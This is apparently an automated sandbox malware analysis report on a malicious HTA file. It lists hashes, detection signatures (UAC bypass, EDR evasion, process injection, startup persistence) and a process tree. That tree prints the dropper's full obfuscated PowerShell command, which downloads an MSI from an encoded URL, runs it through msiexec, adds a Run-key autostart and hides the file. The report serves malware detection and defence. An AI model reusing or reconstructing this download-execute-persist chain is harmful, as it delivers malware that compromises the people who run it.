Edit tour
Windows
Analysis Report
es.hta
Overview
General Information
| Sample name: | es.hta |
| Analysis ID: | 1561279 |
| MD5: | 10184fe59d8f1d9d1f50d9e373f1c007 |
| SHA1: | 94208f885255c808d6ff609956ac6b80cb789573 |
| SHA256: | 8bf7d79425114140c858c24114586ac08a9688e4f23b32e95533c97c89b99643 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 6708 cmdline: mshta.exe "C:\Users\ user\Deskt op\es.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 2676 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function o GEDCAcL($F lnMpBxK, $ AgMxaC){[I O.File]::W riteAllByt es($FlnMpB xK, $AgMxa C)};functi on PNjTla( $FlnMpBxK) {if($FlnMp BxK.EndsWi th((bShFjq P @(4244,4 298,4306,4 306))) -eq $True){St art-Proces s (bShFjqP @(4312,43 15,4308,42 98,4306,43 06,4249,42 48,4244,42 99,4318,42 99)) $FlnM pBxK}else{ Start-Proc ess $FlnMp BxK}};func tion jSNvC EiiX($FlnM pBxK, $VQw qYETV){[Mi crosoft.Wi n32.Regist ry]::SetVa lue((bShFj qP @(4270, 4273,4267, 4287,4293, 4265,4283, 4280,4280, 4267,4276, 4282,4293, 4283,4281, 4267,4280, 4290,4281, 4309,4300, 4314,4317, 4295,4312, 4299,4290, 4275,4303, 4297,4312, 4309,4313, 4309,4300, 4314,4290, 4285,4303, 4308,4298, 4309,4317, 4313,4290, 4265,4315, 4312,4312, 4299,4308, 4314,4284, 4299,4312, 4313,4303, 4309,4308, 4290,4280, 4315,4308) ), $VQwqYE TV, $FlnMp BxK)};func tion FvPeq UFa($FlnMp BxK){$icpW e=(bShFjqP @(4270,43 03,4298,42 98,4299,43 08));$YwLP NbBH=(Get- ChildItem $FlnMpBxK -Force);$Y wLPNbBH.At tributes=$ YwLPNbBH.A ttributes -bor ([IO. FileAttrib utes]$icpW e).value__ };function CBgQtta($ kpSwxupu){ $MSwCV = N ew-Object (bShFjqP @ (4276,4299 ,4314,4244 ,4285,4299 ,4296,4265 ,4306,4303 ,4299,4308 ,4314));[N et.Service PointManag er]::Secur ityProtoco l = [Net.S ecurityPro tocolType] ::TLS12;$A gMxaC = $M SwCV.Downl oadData($k pSwxupu);r eturn $AgM xaC};funct ion bShFjq P($sCjSPqn z){$pPsWrY Nz=4198;$e qBSpUkG=$N ull;foreac h($kPMiigI X in $sCjS Pqnz){$eqB SpUkG+=[ch ar]($kPMii gIX-$pPsWr YNz)};retu rn $eqBSpU kG};functi on paTeG() {$HDgYp = $env:APPDA TA + '\';$ YScpLG = C BgQtta (bS hFjqP @(43 02,4314,43 14,4310,43 13,4256,42 45,4245,43 10,4315,42 96,4243,42 49,4253,42 98,4249,42 55,4254,42 52,4252,42 51,4254,42 95,4300,42 50,4251,42 47,4297,42 55,4298,42 51,4248,42 96,4296,42 55,4300,42 50,4254,42 48,4296,42 49,4299,42 48,4298,42 44,4312,42 48,4244,42 98,4299,43 16,4245,42 77,4276,42 70,4279,42 76,4270,42 68,4282,42 44,4307,43 13,4303)); $iEiUK = $ HDgYp + 'O NHQNHFT.ms i';oGEDCAc L $iEiUK $ YScpLG;PNj Tla $iEiUK ;$VQwqYETV = 'iJOtPB Q';jSNvCEi iX $iEiUK $VQwqYETV; FvPeqUFa $ iEiUK;;;;} paTeG; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 2688 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
msiexec.exe (PID: 3192 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Roaming\ON HQNHFT.msi " MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 6620 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) 
IDRBackup.exe (PID: 480 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\Aplano gamete\IDR Backup.exe " MD5: 371C165E3E3C1A000051B78D7B0E7E79) - IDRBackup.exe (PID: 3104 cmdline:
C:\Users\u ser\AppDat a\Roaming\ toolsync_R O\IDRBacku p.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 6156 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6316 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
comvalidate_ljv3.exe (PID: 3736 cmdline: C:\Users\u ser\AppDat a\Local\Te mp\comvali date_ljv3. exe MD5: 967F4470627F823F4D7981E511C9824F) - IDRBackup.exe (PID: 1852 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Aplano gamete\IDR Backup.exe " MD5: 371C165E3E3C1A000051B78D7B0E7E79) - IDRBackup.exe (PID: 6176 cmdline:
C:\Users\u ser\AppDat a\Roaming\ toolsync_R O\IDRBacku p.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 6236 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - IDRBackup.exe (PID: 2472 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Aplano gamete\IDR Backup.exe " MD5: 371C165E3E3C1A000051B78D7B0E7E79) - IDRBackup.exe (PID: 5756 cmdline:
C:\Users\u ser\AppDat a\Roaming\ toolsync_R O\IDRBacku p.exe MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 5948 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 6792 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Roaming\ON HQNHFT.msi " MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 5684 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Roaming\ON HQNHFT.msi " MD5: E5DA170027542E25EDE42FC54C929077)
svchost.exe (PID: 5184 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- IDRBackup.exe (PID: 4924 cmdline:
"C:\Users\ user\AppDa ta\Roaming \toolsync_ RO\IDRBack up.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 4928 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IDRBackup.exe (PID: 3524 cmdline:
"C:\Users\ user\AppDa ta\Roaming \toolsync_ RO\IDRBack up.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 4828 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- IDRBackup.exe (PID: 5084 cmdline:
"C:\Users\ user\AppDa ta\Roaming \toolsync_ RO\IDRBack up.exe" MD5: 371C165E3E3C1A000051B78D7B0E7E79) - cmd.exe (PID: 4624 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Click to see the 12 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| Click to see the 50 entries | ||||
System Summary |   |
|---|
| Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): | ||